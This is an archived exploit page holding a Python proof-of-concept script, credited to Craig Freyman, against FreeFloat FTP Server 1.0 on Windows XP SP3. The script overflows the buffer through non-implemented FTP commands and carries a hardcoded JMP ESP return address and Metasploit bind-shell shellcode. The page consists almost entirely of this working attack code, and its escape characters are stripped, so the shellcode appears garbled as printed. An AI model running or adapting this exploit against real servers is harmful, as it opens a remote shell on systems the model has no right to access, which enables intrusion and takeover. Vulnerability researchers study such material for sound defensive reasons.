Home / exploitsPDF  

FreeFloat FTP 1.0 Any Non Implemented Command Buffer Overflo

Posted on 20 July 2011

#!/usr/bin/python
#Title: Freefloat FTP 1.0 Non Implemented Command Buffer Overflows
#Author: Craig Freyman (@cd1zz)
#Date: July 19, 2011
#Tested on Windows XP SP3 English
#Part of FreeFloat pwn week
#Vendor Notified: 7-18-2011 (no response)
#Software Link: http://www.freefloat.com/sv/freefloat-ftp-server/freefloat-ftp-server.php

import socket,sys,time,struct

if len(sys.argv) < 2:
print "[-]Usage: %s <target addr> <command>" % sys.argv[0] + "
"
print "[-]For example [filename.py 192.168.1.10 PWND] would do the trick."
print "[-]Other options: AUTH, APPE, ALLO, ACCT"
sys.exit(0)

target = sys.argv[1]
command = sys.argv[2]

if len(sys.argv) > 2:
platform = sys.argv[2]

#./msfpayload windows/shell_bind_tcp r | ./msfencode -e x86/shikata_ga_nai -b "x00xffx0dx0ax3dx20"
#[*] x86/shikata_ga_nai succeeded with size 368 (iteration=1)

shellcode = ("xbfx5cx2ax11xb3xd9xe5xd9x74x24xf4x5dx33xc9"
"xb1x56x83xc5x04x31x7dx0fx03x7dx53xc8xe4x4f"
"x83x85x07xb0x53xf6x8ex55x62x24xf4x1exd6xf8"
"x7ex72xdax73xd2x67x69xf1xfbx88xdaxbcxddxa7"
"xdbx70xe2x64x1fx12x9ex76x73xf4x9fxb8x86xf5"
"xd8xa5x68xa7xb1xa2xdax58xb5xf7xe6x59x19x7c"
"x56x22x1cx43x22x98x1fx94x9ax97x68x0cx91xf0"
"x48x2dx76xe3xb5x64xf3xd0x4ex77xd5x28xaex49"
"x19xe6x91x65x94xf6xd6x42x46x8dx2cxb1xfbx96"
"xf6xcbx27x12xebx6cxacx84xcfx8dx61x52x9bx82"
"xcex10xc3x86xd1xf5x7fxb2x5axf8xafx32x18xdf"
"x6bx1exfbx7ex2dxfaxaax7fx2dxa2x13xdax25x41"
"x40x5cx64x0exa5x53x97xcexa1xe4xe4xfcx6ex5f"
"x63x4dxe7x79x74xb2xd2x3exeax4dxdcx3ex22x8a"
"x88x6ex5cx3bxb0xe4x9cxc4x65xaaxccx6axd5x0b"
"xbdxcax85xe3xd7xc4xfax14xd8x0ex8dx12x16x6a"
"xdexf4x5bx8cxf1x58xd5x6ax9bx70xb3x25x33xb3"
"xe0xfdxa4xccxc2x51x7dx5bx5axbcxb9x64x5bxea"
"xeaxc9xf3x7dx78x02xc0x9cx7fx0fx60xd6xb8xd8"
"xfax86x0bx78xfax82xfbx19x69x49xfbx54x92xc6"
"xacx31x64x1fx38xacxdfx89x5ex2dxb9xf2xdaxea"
"x7axfcxe3x7fxc6xdaxf3xb9xc7x66xa7x15x9ex30"
"x11xd0x48xf3xcbx8ax27x5dx9bx4bx04x5exddx53"
"x41x28x01xe5x3cx6dx3excaxa8x79x47x36x49x85"
"x92xf2x79xccxbex53x12x89x2bxe6x7fx2ax86x25"
"x86xa9x22xd6x7dxb1x47xd3x3ax75xb4xa9x53x10"
"xbax1ex53x31")

#7C874413   FFE4             JMP ESP kernel32.dll
ret = struct.pack('<L', 0x7C874413)
padding = "x90" * 150
crash = "x41" * 246 + ret + padding + shellcode

print "\n[*] Freefloat FTP 1.0 Any Non Implemented Command Buffer Overflow
\n[*] Author: Craig Freyman (@cd1zz)
\n[*] Connecting to "+target

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
s.connect((target,21))
except:
print "[-] Connection to "+target+" failed!"
sys.exit(0)

print "[*] Sending " + `len(crash)` + " " + command +" byte crash..."

s.send("USER anonymous
")
s.recv(1024)
s.send("PASS 
")
s.recv(1024)
s.send(command +" " + crash + "
")
time.sleep(4)

 

TOP

Malware :

Exploits :